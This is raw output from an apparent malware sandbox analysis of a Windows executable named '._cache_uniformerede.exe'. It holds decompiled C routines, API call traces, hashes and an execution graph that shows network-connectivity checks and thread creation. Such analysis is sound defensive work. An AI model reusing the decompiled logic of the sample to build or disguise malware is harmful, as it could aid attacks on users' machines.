                                                                                                                                                                                                                              • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,7620FAA0,?,7620F560,00405D94,?,7620FAA0,7620F560,00000000), ref: 00405FF0
                                                                                                                                                                                                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                                                                                                                                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,7620FAA0,?,7620F560,00405D94,?,7620FAA0,7620F560,00000000), ref: 00406098
                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,7620FAA0,?,7620F560,00405D94,?,7620FAA0,7620F560), ref: 004060A8
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                            • String ID: P_B
                                                                                                                                                                                                                            • API String ID: 3248276644-906794629
                                                                                                                                                                                                                            • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                                                                                                                                                            • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                                                                            			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                                                                                                                            				int _t15;
                                                                                                                                                                                                                            				long _t16;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t15 = _a8;
                                                                                                                                                                                                                            				if(_t15 != 0x102) {
                                                                                                                                                                                                                            					if(_t15 != 0x200) {
                                                                                                                                                                                                                            						_t16 = _a16;
                                                                                                                                                                                                                            						L7:
                                                                                                                                                                                                                            						if(_t15 == 0x419 &&  *0x423734 != _t16) {
                                                                                                                                                                                                                            							_push(_t16);
                                                                                                                                                                                                                            							_push(6);
                                                                                                                                                                                                                            							 *0x423734 = _t16;
                                                                                                                                                                                                                            							E00404FFF();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                            						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(IsWindowVisible(_a4) == 0) {
                                                                                                                                                                                                                            						L10:
                                                                                                                                                                                                                            						_t16 = _a16;
                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t16 = E00404F7F(_a4, 1);
                                                                                                                                                                                                                            					_t15 = 0x419;
                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_a12 != 0x20) {
                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E00404610(0x413);
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 0040566D
                                                                                                                                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                                                                                                                                                                                              • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                            • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                                                                                                                                                            • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                                                                            			E00406536(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                            				long _t21;
                                                                                                                                                                                                                            				long _t24;
                                                                                                                                                                                                                            				char* _t30;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                                                                            				_v8 = 0x800;
                                                                                                                                                                                                                            				_t21 = E004064D5(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                                                                                                                                                                                            				_t30 = _a16;
                                                                                                                                                                                                                            				if(_t21 != 0) {
                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                            					 *_t30 =  *_t30 & 0x00000000;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                                                                                                                                                                                            					_t21 = RegCloseKey(_a20);
                                                                                                                                                                                                                            					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                                                                                                                                                                                            					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                                                                                                                                                                            						goto L4;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t21;
                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,0040679D,80000002), ref: 0040657C
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll), ref: 00406587
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseQueryValue
                                                                                                                                                                                                                            • String ID: Call
                                                                                                                                                                                                                            • API String ID: 3356406503-1824292864
                                                                                                                                                                                                                            • Opcode ID: abb8e2472c70d4d58aecb7d0dfcf889930bd109b5a1b9baac0574de2233c5019
                                                                                                                                                                                                                            • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: abb8e2472c70d4d58aecb7d0dfcf889930bd109b5a1b9baac0574de2233c5019
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                            			E00405F83(WCHAR* _a4) {
                                                                                                                                                                                                                            				WCHAR* _t5;
                                                                                                                                                                                                                            				WCHAR* _t7;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t7 = _a4;
                                                                                                                                                                                                                            				_t5 =  &(_t7[lstrlenW(_t7)]);
                                                                                                                                                                                                                            				while( *_t5 != 0x5c) {
                                                                                                                                                                                                                            					_push(_t5);
                                                                                                                                                                                                                            					_push(_t7);
                                                                                                                                                                                                                            					_t5 = CharPrevW();
                                                                                                                                                                                                                            					if(_t5 > _t7) {
                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *_t5 =  *_t5 & 0x00000000;
                                                                                                                                                                                                                            				return  &(_t5[1]);
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\._cache_uniformerede.exe,C:\Users\user\Desktop\._cache_uniformerede.exe,80000000,00000003), ref: 00405F89
                                                                                                                                                                                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\._cache_uniformerede.exe,C:\Users\user\Desktop\._cache_uniformerede.exe,80000000,00000003), ref: 00405F99
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CharPrevlstrlen
                                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                            • API String ID: 2709904686-1669384263
                                                                                                                                                                                                                            • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                                                                            • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                            				int _t12;
                                                                                                                                                                                                                            				int _t14;
                                                                                                                                                                                                                            				int _t15;
                                                                                                                                                                                                                            				CHAR* _t17;
                                                                                                                                                                                                                            				CHAR* _t27;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t12 = lstrlenA(_a8);
                                                                                                                                                                                                                            				_t27 = _a4;
                                                                                                                                                                                                                            				_v8 = _t12;
                                                                                                                                                                                                                            				while(lstrlenA(_t27) >= _v8) {
                                                                                                                                                                                                                            					_t14 = _v8;
                                                                                                                                                                                                                            					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                                                                                                                                                                            					_t15 = lstrcmpiA(_t27, _a8);
                                                                                                                                                                                                                            					_t27[_v8] =  *(_t14 + _t27);
                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                            						_t17 = _t27;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t27 = CharNextA(_t27);
                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                            					return _t17;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t17 = 0;
                                                                                                                                                                                                                            				goto L5;
                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
Memory Dump Source
• Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 190613189-0
                                                                                                                                                                                                                            • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                                                                                                                                                            • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                            Execution Coverage:7.6%
                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                            Signature Coverage:0.3%
                                                                                                                                                                                                                            Total number of Nodes:1062
                                                                                                                                                                                                                            Total number of Limit Nodes:56
43d722 47290->47240 47291->47241 47292->47244 47293->47252 47294->47254 47295->47246 47296->47250 47298 43a3d4 47297->47298 47299 421f9c 104 API calls 47298->47299 47300 43a3ea 47299->47300 47300->47290 47302 404e8c 47301->47302 47303 404ec7 47302->47303 47304 404a84 25 API calls 47302->47304 47303->47267 47305 404ea3 47304->47305 47305->47303 47306 40277c 12 API calls 47305->47306 47306->47303 47307->46777 47316 45a4e8 PeekMessageA 47308->47316 47311 45a59c 47311->46782 47313->46780 47314->46782 47315->46782 47317 45a504 47316->47317 47318 45a572 47316->47318 47317->47318 47329 45a448 47317->47329 47318->47311 47328 45ae50 90 API calls 47318->47328 47327 45a564 TranslateMessage DispatchMessageA 47327->47318 47328->47311 47330 45a473 47329->47330 47331 45a45c 47329->47331 47330->47318 47333 45a340 47330->47333 47331->47330 47353 45b3a8 8 API calls 47331->47353 47334 45a350 47333->47334 47335 45a38a 47333->47335 47334->47335 47336 45a377 TranslateMDISysAccel 47334->47336 47335->47318 47337 45a390 47335->47337 47336->47335 47338 45a441 47337->47338 47339 45a3a8 47337->47339 47338->47318 47350 45a31c 47338->47350 47339->47338 47340 45a3b3 GetCapture 47339->47340 47341 45a414 GetWindowLongA 47340->47341 47345 45a3be 47340->47345 47341->47338 47342 45a424 SendMessageA 47341->47342 47342->47338 47344 45a410 47342->47344 47344->47338 47346 45a3ef 47345->47346 47347 45a3d8 GetParent 47345->47347 47349 45a3cf 47345->47349 47354 437e5c 7 API calls 47345->47354 47348 45a3f5 SendMessageA 47346->47348 47346->47349 47347->47345 47348->47338 47348->47344 47349->47348 47351 45a33c 47350->47351 47352 45a32f IsDialogMessage 47350->47352 47351->47318 47351->47327 47352->47351 47353->47330 47354->47345 47355 40408a 47360 40416d 47355->47360 47361 40409d 47355->47361 47356 404110 47357 404140 RtlUnwind 47356->47357 47358 40412b UnhandledExceptionFilter 47356->47358 47359 406cdc 4 API calls 47357->47359 47358->47357 47358->47360 47359->47360 47361->47356 47361->47360 47362 4040f0 
UnhandledExceptionFilter 47361->47362 47362->47360 47363 404105 47362->47363 47363->47357 47364 4348a8 47365 4348d3 47364->47365 47366 43497d 47364->47366 47368 4348e3 SendMessageA 47365->47368 47367 4049c0 12 API calls 47366->47367 47369 434992 47367->47369 47370 434901 47368->47370 47371 4348ef 47368->47371 47373 434912 SendMessageA 47370->47373 47382 404ccc 47371->47382 47373->47366 47375 43491e 47373->47375 47374 4348ff 47376 434959 SendMessageA 47374->47376 47377 43492e SendMessageA 47375->47377 47378 434967 47376->47378 47377->47366 47379 434938 47377->47379 47381 434977 SendMessageA 47378->47381 47380 404ccc 26 API calls 47379->47380 47380->47374 47381->47366 47383 404cd0 47382->47383 47384 404d31 47382->47384 47385 404a14 47383->47385 47386 404cd8 47383->47386 47387 404a28 47385->47387 47392 404a84 25 API calls 47385->47392 47386->47384 47389 404ce7 47386->47389 47390 404a14 26 API calls 47386->47390 47388 404a56 47387->47388 47393 40277c 12 API calls 47387->47393 47388->47374 47391 404a84 25 API calls 47389->47391 47390->47389 47394 404d01 47391->47394 47392->47387 47393->47388 47395 404a14 26 API calls 47394->47395 47396 404d2d 47395->47396 47396->47374 47397 41daec 47400 4099a0 SetFilePointer 47397->47400 47399 41db03 47400->47399 47401 402d70 47402 402d86 47401->47402 47403 402de8 CreateFileA 47402->47403 47404 402e9a GetStdHandle 47402->47404 47415 402d8c 47402->47415 47405 402e06 47403->47405 47406 402f0e GetLastError 47403->47406 47404->47406 47409 402ed5 47404->47409 47408 402e14 GetFileSize 47405->47408 47405->47409 47406->47415 47408->47406 47410 402e28 47408->47410 47411 402edf GetFileType 47409->47411 47409->47415 47412 402e31 SetFilePointer 47410->47412 47413 402e2f 47410->47413 47414 402efa CloseHandle 47411->47414 47411->47415 47412->47406 47416 402e44 ReadFile 47412->47416 47413->47412 47414->47415 47416->47406 47417 402e66 47416->47417 47417->47409 47418 402e79 SetFilePointer 47417->47418 47418->47406 47419 402e8e SetEndOfFile 47418->47419 
47419->47406 47420 402e98 47419->47420 47420->47409 47421 437d70 SetWindowLongA GetWindowLongA 47422 437daf GetWindowLongA 47421->47422 47423 437dcd SetPropA SetPropA 47421->47423 47422->47423 47424 437dbe SetWindowLongA 47422->47424 47427 422ba4 47423->47427 47424->47423 47433 498248 47427->47433 47436 43f118 47427->47436 47452 43eec0 47427->47452 47459 459934 47427->47459 47428 422bba 47434 441704 47433->47434 47435 498253 CreateThread 47434->47435 47435->47428 47543 497cf0 47435->47543 47437 43f143 47436->47437 47438 43f12b 47436->47438 47441 43f13e 47437->47441 47673 43f084 59 API calls 47437->47673 47439 43f19d 47438->47439 47446 43f12d 47438->47446 47440 43c1fc 153 API calls 47439->47440 47447 43f1a6 47440->47447 47443 43f1da 47441->47443 47662 43c1fc 47441->47662 47443->47428 47444 43f1f7 47444->47441 47450 43f1fb 47444->47450 47446->47441 47448 43f23a GetCapture 47446->47448 47447->47443 47672 43eff0 58 API calls 47447->47672 47448->47441 47450->47443 47451 43f21e NtdllDefWindowProc_A 47450->47451 47451->47443 47458 43f118 156 API calls 47452->47458 47453 43eeef 47715 4399a4 90 API calls 47453->47715 47455 43ef01 47716 428b50 92 API calls 47455->47716 47457 43ef06 47457->47428 47458->47453 47460 45999c 47459->47460 47466 45996a 47459->47466 47717 4597e8 47460->47717 47462 4599a7 47464 459a65 47462->47464 47465 4599b7 47462->47465 47467 459a6c 47464->47467 47468 459abb 47464->47468 47469 459f03 47465->47469 47470 4599bd 47465->47470 47466->47460 47539 45998b 47466->47539 47725 41ac6c 57 API calls 47466->47725 47471 459a72 47467->47471 47499 459ddb 47467->47499 47477 459f1d 47468->47477 47478 459ac8 47468->47478 47483 459a49 47468->47483 47737 45aae4 13 API calls 47469->47737 47475 459a31 47470->47475 47476 459a4e 47470->47476 47470->47483 47470->47539 47473 459aa2 47471->47473 47474 459a79 47471->47474 47473->47483 47493 459db9 47473->47493 47473->47539 47490 459a86 47474->47490 47491 459afd 47474->47491 47474->47539 47484 459fa7 47475->47484 47485 459a37 
47475->47485 47486 459a57 47476->47486 47487 459b93 47476->47487 47479 459f26 47477->47479 47480 459f3e 47477->47480 47481 459ec4 IsIconic 47478->47481 47482 459ad3 47478->47482 47738 45a5a4 26 API calls 47479->47738 47739 45a600 58 API calls 47480->47739 47494 459ed8 GetFocus 47481->47494 47481->47539 47482->47469 47482->47483 47483->47539 47724 4598ac NtdllDefWindowProc_A 47483->47724 47742 4598ac NtdllDefWindowProc_A 47484->47742 47495 459f81 47485->47495 47496 459a40 47485->47496 47486->47483 47497 459ce4 47486->47497 47498 45a038 64 API calls 47487->47498 47490->47483 47500 459c9c SendMessageA 47490->47500 47502 459b0f 47491->47502 47503 459b18 47491->47503 47733 45a47c IsWindowEnabled 47493->47733 47504 459ee9 47494->47504 47494->47539 47501 445ed0 24 API calls 47495->47501 47496->47483 47505 459bc7 47496->47505 47517 459d12 47497->47517 47497->47539 47498->47539 47515 459e01 IsWindowEnabled 47499->47515 47499->47539 47500->47539 47508 459f93 47501->47508 47509 459b25 47502->47509 47510 459b16 47502->47510 47726 45a054 71 API calls 47503->47726 47736 451750 GetCurrentThreadId 73C9AC10 47504->47736 47729 4598ac NtdllDefWindowProc_A 47505->47729 47740 459840 12 API calls 47508->47740 47727 45a104 68 API calls 47509->47727 47728 4598ac NtdllDefWindowProc_A 47510->47728 47514 459bcd 47520 459c0c 47514->47520 47521 459bea 47514->47521 47522 459e0f 47515->47522 47515->47539 47732 40edc4 SetErrorMode LoadLibraryA 47517->47732 47519 459ef0 47526 459ef8 SetFocus 47519->47526 47519->47539 47731 45973c 63 API calls 47520->47731 47730 45974c 58 API calls 47521->47730 47533 459e16 IsWindowVisible 47522->47533 47523 459f9e 47741 4598ac NtdllDefWindowProc_A 47523->47741 47526->47539 47530 459d21 47534 459d70 GetLastError 47530->47534 47535 459d30 GetProcAddress 47530->47535 47531 459bf2 PostMessageA 47531->47539 47532 459c14 PostMessageA 47532->47539 47536 459e24 GetFocus 47533->47536 47533->47539 47534->47539 47537 459d58 47535->47537 47535->47539 47538 441704 47536->47538 
47537->47539 47540 459e39 SetFocus 47538->47540 47539->47428 47734 43c130 47540->47734 47544 497cf8 47543->47544 47544->47544 47545 497cff Sleep 47544->47545 47624 4737b0 GetTempPathA 47545->47624 47547 497d22 47626 472d44 47547->47626 47551 497d4c 47552 4737b0 GetTempPathA 47551->47552 47553 497d54 47552->47553 47554 472d44 28 API calls 47553->47554 47555 497d69 47554->47555 47556 404d40 26 API calls 47555->47556 47557 497d7e 47556->47557 47558 474d34 InternetGetConnectedState 47557->47558 47567 497d87 47558->47567 47559 4049e4 12 API calls 47560 498135 47559->47560 47562 4049c0 12 API calls 47560->47562 47561 404a58 12 API calls 47561->47567 47563 49813d 47562->47563 47564 4049e4 12 API calls 47563->47564 47565 49814a 47564->47565 47566 474d50 46 API calls 47566->47567 47567->47561 47567->47566 47568 497e02 47567->47568 47569 4967d4 12 API calls 47567->47569 47579 497f63 47567->47579 47604 4980dc 47567->47604 47570 430158 26 API calls 47568->47570 47569->47567 47571 497e11 47570->47571 47572 4758e8 26 API calls 47571->47572 47573 497e3a 47572->47573 47574 404a14 26 API calls 47573->47574 47575 497e47 47574->47575 47578 4758e8 26 API calls 47575->47578 47576 404a58 12 API calls 47576->47579 47577 4967d4 12 API calls 47577->47579 47580 497e6e 47578->47580 47579->47576 47579->47577 47582 474d50 46 API calls 47579->47582 47584 49801a 47579->47584 47579->47604 47581 404a14 26 API calls 47580->47581 47583 497e7b 47581->47583 47582->47579 47586 4758e8 26 API calls 47583->47586 47585 49a3e0 417 API calls 47584->47585 47587 498026 47585->47587 47588 497ea2 47586->47588 47591 472ef0 26 API calls 47587->47591 47589 404a14 26 API calls 47588->47589 47592 497eaf 47589->47592 47593 498058 47591->47593 47594 4758e8 26 API calls 47592->47594 47595 498067 47593->47595 47596 4980b6 47593->47596 47597 497ed6 47594->47597 47599 473490 15 API calls 47595->47599 47598 473490 15 API calls 47596->47598 47600 404a14 26 API calls 47597->47600 47601 4980cc 47598->47601 47602 49807c 
